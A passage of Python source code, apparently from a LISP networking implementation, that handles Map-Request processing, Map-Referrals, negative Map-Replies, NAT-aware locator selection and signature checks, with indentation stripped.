action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
